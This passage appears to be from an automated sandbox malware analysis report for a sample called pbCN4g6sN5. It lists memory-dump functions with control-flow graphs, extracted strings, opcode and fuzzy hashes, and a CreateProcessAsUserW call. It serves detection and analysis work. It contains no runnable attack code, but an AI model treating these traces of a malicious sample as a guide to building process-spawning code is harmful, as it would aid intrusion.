                                                                                                                                                                control_flow_graph 1005 5a1dbe8-5a1dc07 1006 5a1ddb5-5a1de06 1005->1006 1007 5a1dc0d-5a1dc13 1005->1007 1031 5a1de20-5a1de2d 1006->1031 1032 5a1de08-5a1de15 1006->1032 1008 5a1dc15-5a1dc1c 1007->1008 1009 5a1dc54-5a1dc68 1007->1009 1012 5a1dc36-5a1dc4f call 5a1d640 1008->1012 1013 5a1dc1e-5a1dc2b 1008->1013 1010 5a1dc8a-5a1dc93 1009->1010 1011 5a1dc6a-5a1dc6e 1009->1011 1016 5a1dc95-5a1dca2 1010->1016 1017 5a1dcad-5a1dcc9 1010->1017 1011->1010 1015 5a1dc70-5a1dc7c 1011->1015 1012->1009 1013->1012 1015->1010 1026 5a1dc7e-5a1dc84 1015->1026 1016->1017 1029 5a1dd71-5a1dd95 1017->1029 1030 5a1dccf-5a1dcda 1017->1030 1026->1010 1040 5a1dd97 1029->1040 1041 5a1dd9f 1029->1041 1036 5a1dcf2-5a1dcf9 1030->1036 1037 5a1dcdc-5a1dce2 1030->1037 1039 5a1de35-5a1de3a 1031->1039 1032->1031 1044 5a1dcfb-5a1dd05 1036->1044 1045 5a1dd0d-5a1dd30 call 5a1942c 1036->1045 1042 5a1dce4 1037->1042 1043 5a1dce6-5a1dce8 1037->1043 1046 5a1de81-5a1de88 1039->1046 1047 5a1de3c-5a1de43 1039->1047 1040->1041 1041->1006 1042->1036 1043->1036 1044->1045 1058 5a1dd41-5a1dd52 1045->1058 1059 5a1dd32-5a1dd3f 1045->1059 1051 5a1dea2-5a1deab 1046->1051 1052 5a1de8a-5a1de97 1046->1052 1048 5a1de45-5a1de52 1047->1048 1049 5a1de5d-5a1de72 1047->1049 1048->1049 1049->1046 1063 5a1de74-5a1de7b 1049->1063 1054 5a1deb1-5a1deb4 1051->1054 1055 5a1dead-5a1deaf 1051->1055 1052->1051 1061 5a1deb5-5a1dec6 1054->1061 1055->1061 1070 5a1dd5f-5a1dd6b 1058->1070 1071 5a1dd54-5a1dd57 1058->1071 1059->1058 1059->1070 1068 5a1df09-5a1df0c 1061->1068 1069 5a1dec8-5a1decf 1061->1069 1063->1046 1067 5a1df0f-5a1df3a call 5a15a20 1063->1067 1082 5a1df41-5a1dfa2 call 5a15a20 1067->1082 1073 5a1ded1-5a1dede 1069->1073 1074 5a1dee9-5a1defe 1069->1074 1070->1029 1070->1030 1071->1070 1073->1074 1074->1068 1080 5a1df00-5a1df07 1074->1080 1080->1068 1080->1082 1090 5a1dfa4-5a1dfb7 1082->1090 1091 5a1dfba-5a1dfc0 1082->1091 1092 5a1e030-5a1e088 1091->1092 1093 5a1dfc2-5a1dfc9 1091->1093 1095 5a1e08f-5a1e0e7 1092->1095 1093->1095 1096 5a1dfcf-5a1dfdf 1093->1096 1102 5a1e0ee-5a1e15c 1095->1102 1101 5a1dfe5-5a1dfe9 1096->1101 1096->1102 1104 5a1dfec-5a1dfee 1101->1104 1133 5a1e163-5a1e1d0 1102->1133 1105 5a1dff0-5a1e000 1104->1105 1106 5a1e013-5a1e015 1104->1106 1116 5a1e002-5a1e011 1105->1116 1117 5a1dfeb 1105->1117 1109 5a1e024-5a1e02d 1106->1109 1110 5a1e017-5a1e021 1106->1110 1116->1106 1116->1117 1117->1104 1143 5a1e1d2-5a1e1fc 1133->1143 1144 5a1e24e-5a1e2a6 1143->1144 1145 5a1e1fe-5a1e20e 1143->1145 1149 5a1e2ad-5a1e3ba 1144->1149 1148 5a1e214-5a1e218 1145->1148 1145->1149 1151 5a1e21b-5a1e21d 1148->1151 1183 5a1e3d2-5a1e3d8 1149->1183 1184 5a1e3bc-5a1e3cf 1149->1184 1153 5a1e231-5a1e233 1151->1153 1154 5a1e21f-5a1e22f 1151->1154 1156 5a1e242-5a1e24b 1153->1156 1157 5a1e235-5a1e23f 1153->1157 1154->1153 1161 5a1e21a 1154->1161 1161->1151 1185 5a1e452-5a1e4aa 1183->1185 1186 5a1e3da-5a1e3e1 1183->1186 1188 5a1e4b1-5a1e509 1185->1188 1186->1188 1189 5a1e3e7-5a1e3eb 1186->1189 1192 5a1e510-5a1e614 1188->1192 1191 5a1e3f1-5a1e3f5 1189->1191 1189->1192 1194 5a1e3f8-5a1e405 1191->1194 1236 5a1e670-5a1e6c8 1192->1236 1237 5a1e616-5a1e61a 1192->1237 1200 5a1e407-5a1e417 1194->1200 1201 5a1e42a-5a1e437 1194->1201 1209 5a1e3f7 1200->1209 1210 5a1e419-5a1e428 1200->1210 1211 5a1e446-5a1e44f 1201->1211 1212 5a1e439-5a1e443 1201->1212 1209->1194 1210->1201 1210->1209 1239 5a1e6cf-5a1e7c8 1236->1239 1238 5a1e620-5a1e624 1237->1238 1237->1239 1241 5a1e627-5a1e634 1238->1241 1277 5a1e7e0-5a1e7e1 1239->1277 1278 5a1e7ca-5a1e7d0 1239->1278 1246 5a1e636-5a1e646 1241->1246 1247 5a1e648-5a1e655 1241->1247 1246->1247 1255 5a1e626 1246->1255 1252 5a1e664-5a1e66d 1247->1252 1253 5a1e657-5a1e661 1247->1253 1255->1241 1279 5a1e7d2 1278->1279 1280 5a1e7d4-5a1e7d6 1278->1280 1279->1277 1280->1277
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2385320229.0000000005A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A10000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_5a10000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: (mq$Hmq$Hmq$Hmq$Hmq$Hmq$Hmq$PHiq
                                                                                                                                                                • API String ID: 0-1751368234
                                                                                                                                                                • Opcode ID: d50a7bdbd1f8c089c972b7d4c6fda3f8f1e3b6481f63f6532f33fedc9ed6b144
                                                                                                                                                                • Instruction ID: d982aa030a22faf97b1de5dbdb79aa96ef711b8747c23c339c8112ea7f3b9641
                                                                                                                                                                • Opcode Fuzzy Hash: d50a7bdbd1f8c089c972b7d4c6fda3f8f1e3b6481f63f6532f33fedc9ed6b144
                                                                                                                                                                • Instruction Fuzzy Hash: 86628D317006148FCB58EB78C854B6E7BA7AFC8310F248569E81ADB3A5CE34DD468795
                                                                                                                                                                Function 00A17BD0 Relevance: 6.7, Strings: 5, Instructions: 469COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 1281 a17bd0-a17c06 1282 a17c0e-a17c14 1281->1282 1412 a17c08 call a17bd0 1281->1412 1413 a17c08 call a175a9 1281->1413 1283 a17c64-a17c68 1282->1283 1284 a17c16-a17c1a 1282->1284 1285 a17c6a-a17c79 1283->1285 1286 a17c7f-a17c93 1283->1286 1287 a17c29-a17c30 1284->1287 1288 a17c1c-a17c21 1284->1288 1289 a17ca5-a17caf 1285->1289 1290 a17c7b-a17c7d 1285->1290 1291 a17c9b-a17ca2 1286->1291 1292 a17d06-a17d43 1287->1292 1293 a17c36-a17c3d 1287->1293 1288->1287 1294 a17cb1-a17cb7 1289->1294 1295 a17cb9-a17cbd 1289->1295 1290->1291 1302 a17d45-a17d4b 1292->1302 1303 a17d4e-a17d6e 1292->1303 1293->1283 1296 a17c3f-a17c43 1293->1296 1297 a17cc5-a17cff 1294->1297 1295->1297 1301 a17cbf 1295->1301 1299 a17c52-a17c59 1296->1299 1300 a17c45-a17c4a 1296->1300 1297->1292 1299->1292 1304 a17c5f-a17c62 1299->1304 1300->1299 1301->1297 1302->1303 1310 a17d70 1303->1310 1311 a17d75-a17d7c 1303->1311 1304->1291 1313 a18104-a1810d 1310->1313 1312 a17d7e-a17d89 1311->1312 1315 a18115-a18121 1312->1315 1316 a17d8f-a17da2 1312->1316 1322 a18123-a18151 1315->1322 1323 a180c4-a180c8 1315->1323 1320 a17da4-a17db2 1316->1320 1321 a17db8-a17dd3 1316->1321 1320->1321 1336 a1808c-a18093 1320->1336 1338 a17dd5-a17ddb 1321->1338 1339 a17df7-a17dfa 1321->1339 1327 a18153-a18158 1322->1327 1328 a1815a-a1815e 1322->1328 1325 a180ea-a180ec 1323->1325 1326 a180ca-a180cc 1323->1326 1333 a18110 1325->1333 1334 a180ee-a180f1 1325->1334 1329 a180db-a180e1 1326->1329 1330 a180ce-a180d3 1326->1330 1335 a18164-a18165 1327->1335 1328->1335 1329->1315 1337 a180e3-a180e8 1329->1337 1330->1329 1333->1315 1346 a180f8-a180fb 1334->1346 1336->1313 1345 a18095-a18097 1336->1345 1337->1325 1342 a180be-a180c1 1337->1342 1343 a17de4-a17de7 1338->1343 1344 a17ddd 1338->1344 1340 a17e00-a17e03 1339->1340 1341 a17f54-a17f5a 1339->1341 1340->1341 1347 a17e09-a17e0f 1340->1347 1348 a17f60-a17f65 1341->1348 1349 a18046-a18049 1341->1349 1342->1333 1350 a180c3 1342->1350 1351 a17de9-a17dec 1343->1351 1352 a17e1a-a17e20 1343->1352 1344->1341 1344->1343 1344->1349 1344->1352 1353 a180a6-a180ac 1345->1353 1354 a18099-a1809e 1345->1354 1346->1333 1355 a180fd-a18102 1346->1355 1347->1341 1357 a17e15 1347->1357 1348->1349 1349->1333 1358 a1804f-a18055 1349->1358 1350->1323 1361 a17df2 1351->1361 1362 a17e86-a17e8c 1351->1362 1359 a17e22-a17e24 1352->1359 1360 a17e26-a17e28 1352->1360 1353->1315 1356 a180ae-a180b3 1353->1356 1354->1353 1355->1313 1355->1345 1356->1346 1363 a180b5-a180ba 1356->1363 1357->1349 1364 a18057-a1805f 1358->1364 1365 a1807a-a1807e 1358->1365 1366 a17e32-a17e3b 1359->1366 1360->1366 1361->1349 1362->1349 1367 a17e92-a17e98 1362->1367 1363->1333 1368 a180bc 1363->1368 1364->1315 1371 a18065-a18074 1364->1371 1365->1336 1374 a18080-a18086 1365->1374 1372 a17e3d-a17e48 1366->1372 1373 a17e4e-a17e76 1366->1373 1369 a17e9a-a17e9c 1367->1369 1370 a17e9e-a17ea0 1367->1370 1368->1350 1375 a17eaa-a17ec1 1369->1375 1370->1375 1371->1321 1371->1365 1372->1349 1372->1373 1386 a17f6a-a17fa0 1373->1386 1387 a17e7c-a17e81 1373->1387 1374->1312 1374->1336 1380 a17ec3-a17edc 1375->1380 1381 a17eec-a17f13 1375->1381 1380->1386 1390 a17ee2-a17ee7 1380->1390 1381->1333 1392 a17f19-a17f1c 1381->1392 1393 a17fa2-a17fa6 1386->1393 1394 a17fad-a17fb5 1386->1394 1387->1386 1390->1386 1392->1333 1395 a17f22-a17f4b 1392->1395 1396 a17fc5-a17fc9 1393->1396 1397 a17fa8-a17fab 1393->1397 1394->1333 1398 a17fbb-a17fc0 1394->1398 1395->1386 1410 a17f4d-a17f52 1395->1410 1399 a17fe8-a17fec 1396->1399 1400 a17fcb-a17fd1 1396->1400 1397->1394 1397->1396 1398->1349 1403 a17ff6-a18015 call a182f8 1399->1403 1404 a17fee-a17ff4 1399->1404 1400->1399 1402 a17fd3-a17fdb 1400->1402 1402->1333 1405 a17fe1-a17fe6 1402->1405 1407 a1801b-a1801f 1403->1407 1404->1403 1404->1407 1405->1349 1407->1349 1408 a18021-a1803d 1407->1408 1408->1349 1410->1386 1412->1282 1413->1282
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2376261436.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_a10000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: (oiq$(oiq$(oiq$,mq$,mq
                                                                                                                                                                • API String ID: 0-2328226788
                                                                                                                                                                • Opcode ID: 23bc6c8cb192522e0c03b23f8b856f883475cc7a9e379c319c6e2e3b0bd37949
                                                                                                                                                                • Instruction ID: a8d12c8214902ea1d98e255436b054c28831f38e30f9122300ea3bdd54d29524
                                                                                                                                                                • Opcode Fuzzy Hash: 23bc6c8cb192522e0c03b23f8b856f883475cc7a9e379c319c6e2e3b0bd37949
                                                                                                                                                                • Instruction Fuzzy Hash: 10124F71A04209DFDB14CF69D984AEEBBF6FF88300F158069E415AB261DB35ED86CB50
                                                                                                                                                                Function 07643433 Relevance: 5.5, Instructions: 5534COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 1567 7643433-7643681 1595 7643687-76443f7 1567->1595 1596 7645673-76458f7 1567->1596 2018 76446f6-764566b 1595->2018 2019 76443fd-76446ee 1595->2019 1663 76468f6-7647875 1596->1663 1664 76458fd-76468ee 1596->1664 2234 7647b84-7647b97 1663->2234 2235 764787b-7647b7c 1663->2235 1664->1663 2018->1596 2019->2018 2240 7648197-76490ff call 764a9f8 2234->2240 2241 7647b9d-764818f 2234->2241 2235->2234 2633 7649105-764910c 2240->2633 2241->2240
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2387274782.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_7640000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 5f4ecd94ff4d953450869266e95cc3647e72012635f4e4d4e93566047f03ba6f
                                                                                                                                                                • Instruction ID: ce296de81b05e5f2a5d4b861c96f2794a3aafbd98953e5c6ae2a3a12939a91f2
                                                                                                                                                                • Opcode Fuzzy Hash: 5f4ecd94ff4d953450869266e95cc3647e72012635f4e4d4e93566047f03ba6f
                                                                                                                                                                • Instruction Fuzzy Hash: 9FB30870A11218CFCB59EF78D9996ADBBF2EB89300F4044E9D449A7258DF386D84DF81
                                                                                                                                                                Function 07643448 Relevance: 5.5, Instructions: 5524COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 2635 7643448-7643681 2663 7643687-76443f7 2635->2663 2664 7645673-76458f7 2635->2664 3086 76446f6-764566b 2663->3086 3087 76443fd-76446ee 2663->3087 2731 76468f6-7647875 2664->2731 2732 76458fd-76468ee 2664->2732 3302 7647b84-7647b97 2731->3302 3303 764787b-7647b7c 2731->3303 2732->2731 3086->2664 3087->3086 3308 7648197-76490ff call 764a9f8 3302->3308 3309 7647b9d-764818f 3302->3309 3303->3302 3701 7649105-764910c 3308->3701 3309->3308
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2387274782.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_7640000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 373ef56e3c0652b08941faf32aa5456a58858273a1d5885cfdcb5b883f54248b
                                                                                                                                                                • Instruction ID: 72795897c40cb79d59d3ab1d0b6754f518709b1aec62ae2402be254e8ceb8e67
                                                                                                                                                                • Opcode Fuzzy Hash: 373ef56e3c0652b08941faf32aa5456a58858273a1d5885cfdcb5b883f54248b
                                                                                                                                                                • Instruction Fuzzy Hash: B6B30870A11218CFCB59EF78D9996ADBBF2EB89300F4044E9D449A7258DF386D84DF81
                                                                                                                                                                Function 06D02100 Relevance: 5.2, Instructions: 5246COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 4824 6d02100-6d07908 call 6d089f9 call 6d09156 5794 6d0790e-6d07915 4824->5794
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2385866228.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_6d00000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: b9ecc78f29d8c6d079a760fc2870b1d58244cdbbc5af3043087c20a90c512bbc
                                                                                                                                                                • Instruction ID: 0e87a7a31b3c0bd93027734b20b40144b8b589a0b5a818d817529955ac499c91
                                                                                                                                                                • Opcode Fuzzy Hash: b9ecc78f29d8c6d079a760fc2870b1d58244cdbbc5af3043087c20a90c512bbc
                                                                                                                                                                • Instruction Fuzzy Hash: 30B30B70A112188BDB54EF78EA586ACBBF2FB89300F4085EAD488A7358DF345D84DF55
                                                                                                                                                                Function 08EAB6F8 Relevance: 5.2, Strings: 4, Instructions: 190COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 5797 8eab6f8-8eab71d 5798 8eab71f 5797->5798 5799 8eab724-8eab748 5797->5799 5798->5799 5800 8eab749 5799->5800 5801 8eab750-8eab76c 5800->5801 5802 8eab76e 5801->5802 5803 8eab775-8eab776 5801->5803 5802->5800 5802->5803 5804 8eab86a-8eab89d call 8ea9a38 5802->5804 5805 8eab7c8-8eab7d0 5802->5805 5806 8eab8ce-8eab8d1 5802->5806 5807 8eab80e-8eab826 5802->5807 5808 8eab98d-8eab996 5802->5808 5809 8eab7a1-8eab7b2 5802->5809 5810 8eab8a5 5802->5810 5811 8eab93b-8eab96e call 8ea5088 5802->5811 5812 8eab77b-8eab79f 5802->5812 5813 8eab99b-8eab9a4 5802->5813 5814 8eab852-8eab865 5802->5814 5815 8eab8f0-8eab908 5802->5815 5816 8eab976-8eab988 5802->5816 5803->5813 5804->5810 5818 8eab7d7-8eab7e2 5805->5818 5829 8eab8da-8eab8eb 5806->5829 5835 8eab828-8eab837 5807->5835 5836 8eab839-8eab840 5807->5836 5808->5801 5832 8eab7d2-8eab7d4 5809->5832 5833 8eab7b4-8eab7c6 5809->5833 5827 8eab8ae-8eab8c9 5810->5827 5811->5816 5812->5801 5814->5801 5830 8eab90a-8eab919 5815->5830 5831 8eab91b-8eab922 5815->5831 5816->5801 5824 8eab7e4-8eab7f3 5818->5824 5825 8eab7f5-8eab7fc 5818->5825 5834 8eab803-8eab809 5824->5834 5825->5834 5827->5801 5829->5801 5838 8eab929-8eab936 5830->5838 5831->5838 5832->5818 5833->5801 5834->5801 5837 8eab847-8eab84d 5835->5837 5836->5837 5837->5801 5838->5801
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2387833181.0000000008EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EA0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_8ea0000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: e\1$e\1$"*p$"*p
                                                                                                                                                                • API String ID: 0-1513742261
                                                                                                                                                                • Opcode ID: 74a1aa537b6901133b4135e631d6c27e65d13028f83998c6e7190212ffc45a02
                                                                                                                                                                • Instruction ID: 2b4bd45503273d2f7793e758e51cf16380e194ca2db3b03537a1c966aef25d8e
                                                                                                                                                                • Opcode Fuzzy Hash: 74a1aa537b6901133b4135e631d6c27e65d13028f83998c6e7190212ffc45a02
                                                                                                                                                                • Instruction Fuzzy Hash: 0E8113B4D01219CFCB04CFA5D9846EEBBF2BF88351F20A52AD416BB254DB745A02CF54
                                                                                                                                                                Function 077F3AE4 Relevance: 4.6, Strings: 1, Instructions: 3324COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2387368395.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_77f0000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: T@
                                                                                                                                                                • API String ID: 0-1813571376
                                                                                                                                                                • Opcode ID: 1af94d1d62130db9cdc7cb9111dc342710c2341a33a5ee02ec38fbd5c2c85e38
                                                                                                                                                                • Instruction ID: 4a1f0b694ac5e8adb2c545d5c33bfbe45d7e8ff20927db8ce33f1cac36e0bb44
                                                                                                                                                                • Opcode Fuzzy Hash: 1af94d1d62130db9cdc7cb9111dc342710c2341a33a5ee02ec38fbd5c2c85e38
                                                                                                                                                                • Instruction Fuzzy Hash: EA538F70A142148FCB14FF78DA8975DBBB9EF89300F8085EAD448A7259DB386E84CF55
                                                                                                                                                                Function 077F7CA0 Relevance: 4.1, Strings: 2, Instructions: 1606COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2387368395.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_77f0000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: @$G
                                                                                                                                                                • API String ID: 0-2525716807
                                                                                                                                                                • Opcode ID: 838ee1735737dda5186fd2998f080668399996a3a1605093a40dddd2ff775462
                                                                                                                                                                • Instruction ID: 8e8708ae847554067f1e6e21d8b8776d7576ec73974424a4d2342041f5aa10a4
                                                                                                                                                                • Opcode Fuzzy Hash: 838ee1735737dda5186fd2998f080668399996a3a1605093a40dddd2ff775462
                                                                                                                                                                • Instruction Fuzzy Hash: 4BD2BF30A183148FCB15BB78D95879DBBB6FF89300F4185EAD088E72A9DB386D45CB51
                                                                                                                                                                Function 08EA4070 Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2387833181.0000000008EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EA0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_8ea0000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: 6f$6f$$iq
                                                                                                                                                                • API String ID: 0-138693396
                                                                                                                                                                • Opcode ID: 7c0735b9037cd5c51edfe32c250a28431f82f566d309237dfd85e9a59f3d340d
                                                                                                                                                                • Instruction ID: e5218af317a5c1b4e3c194146537d5df8e801becba258b8c6f61f39a225fa661
                                                                                                                                                                • Opcode Fuzzy Hash: 7c0735b9037cd5c51edfe32c250a28431f82f566d309237dfd85e9a59f3d340d
                                                                                                                                                                • Instruction Fuzzy Hash: C971C178E10208DFDB44DFA5D59599EBFB2FF88301F20902AE40AAB394DB345946CF55
                                                                                                                                                                Function 06D0F15D Relevance: 3.4, Strings: 2, Instructions: 902COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2385866228.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_6d00000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: G$Teiq
                                                                                                                                                                • API String ID: 0-244323017
                                                                                                                                                                • Opcode ID: 1441f0184e6ea33e98b325dfe041857211db562e94cccfd609f4746cc1325f1f
                                                                                                                                                                • Instruction ID: 7e227dff16e596fc80a75ed8811a070b6e5964a8fe067b1a4ed318045cc44b4c
                                                                                                                                                                • Opcode Fuzzy Hash: 1441f0184e6ea33e98b325dfe041857211db562e94cccfd609f4746cc1325f1f
                                                                                                                                                                • Instruction Fuzzy Hash: 91720130A183058FD715FB78DD58B5D7FB2EF86200F4585EAC488E72A9DA389C49CB61
                                                                                                                                                                Function 00A175A9 Relevance: 3.0, Strings: 2, Instructions: 516COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2376261436.0000000000A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A10000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_a10000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: (oiq$Hmq
                                                                                                                                                                • API String ID: 0-3937764413
                                                                                                                                                                • Opcode ID: 4aa1cc0ca572ebe6073a291e77d7f73ae65ef63450f6e9f81ca481a9c495982e
                                                                                                                                                                • Instruction ID: 340cf84821373568e329a34486ca9a7cdfc025a04ed91e1be1d44fe809e7a47b
                                                                                                                                                                • Opcode Fuzzy Hash: 4aa1cc0ca572ebe6073a291e77d7f73ae65ef63450f6e9f81ca481a9c495982e
                                                                                                                                                                • Instruction Fuzzy Hash: 51129070A042199FDB14DF69C854BAEBBB6FF88300F208569E445DB395DF349D85CB90
                                                                                                                                                                Function 077FDB18 Relevance: 2.7, Strings: 2, Instructions: 207COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2387368395.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_77f0000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: Teiq$Teiq
                                                                                                                                                                • API String ID: 0-585364711
                                                                                                                                                                • Opcode ID: ab14b3c6dfa5e1d8b12458fc6ff63256912bcbfeebb17fb805d67afe242d1eee
                                                                                                                                                                • Instruction ID: ab9640f4a29128bc0c9ce5f846a4a8f35b154c3d2467c18237de880c19ccd585
                                                                                                                                                                • Opcode Fuzzy Hash: ab14b3c6dfa5e1d8b12458fc6ff63256912bcbfeebb17fb805d67afe242d1eee
                                                                                                                                                                • Instruction Fuzzy Hash: 6691E2B0E142099FCB08CFAAC994A9EFBB2FF89300F24942AD515BB354D7749906CF54
                                                                                                                                                                Function 08EA4060 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2387833181.0000000008EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EA0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_8ea0000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: 6f$$iq
                                                                                                                                                                • API String ID: 0-2737234785
                                                                                                                                                                • Opcode ID: 2345de85ce3dfd37d1e3ddc925a7038f55bea3bf70632e2900af663f56894f24
                                                                                                                                                                • Instruction ID: 694a1eed54b5c02eb5984b8faa17f6f947334d810380ee272ebc92b083eeafd5
                                                                                                                                                                • Opcode Fuzzy Hash: 2345de85ce3dfd37d1e3ddc925a7038f55bea3bf70632e2900af663f56894f24
                                                                                                                                                                • Instruction Fuzzy Hash: 4A71D478E10208DFDB44DFA5D59599EBFB2FF88301F20902AE406AB7A4DB345946CF51
                                                                                                                                                                Function 08EAB178 Relevance: 1.7, APIs: 1, Instructions: 164processCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • CreateProcessAsUserW.KERNELBASE(?,?,?,0000000A,?,?,?,?,?,?,?), ref: 08EAB2E3
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2387833181.0000000008EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EA0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_8ea0000_pbCN4g6sN5.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateProcessUser
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2217836671-0
                                                                                                                                                                • Opcode ID: 61b169b2eac258ef0955bcf30fec4a679cda02c9345afb81c591765451636ef0
                                                                                                                                                                • Instruction ID: ca96ab1ab024eb2ec1af877b1222f70421bd4b7b19126624d5fb7c37c8a6ed36
                                                                                                                                                                • Opcode Fuzzy Hash: 61b169b2eac258ef0955bcf30fec4a679cda02c9345afb81c591765451636ef0
                                                                                                                                                                • Instruction Fuzzy Hash: B451F871D00229DFDB24CF99D840BDDBBB5BF88714F1480AAE908B7250DB75AA85CF90
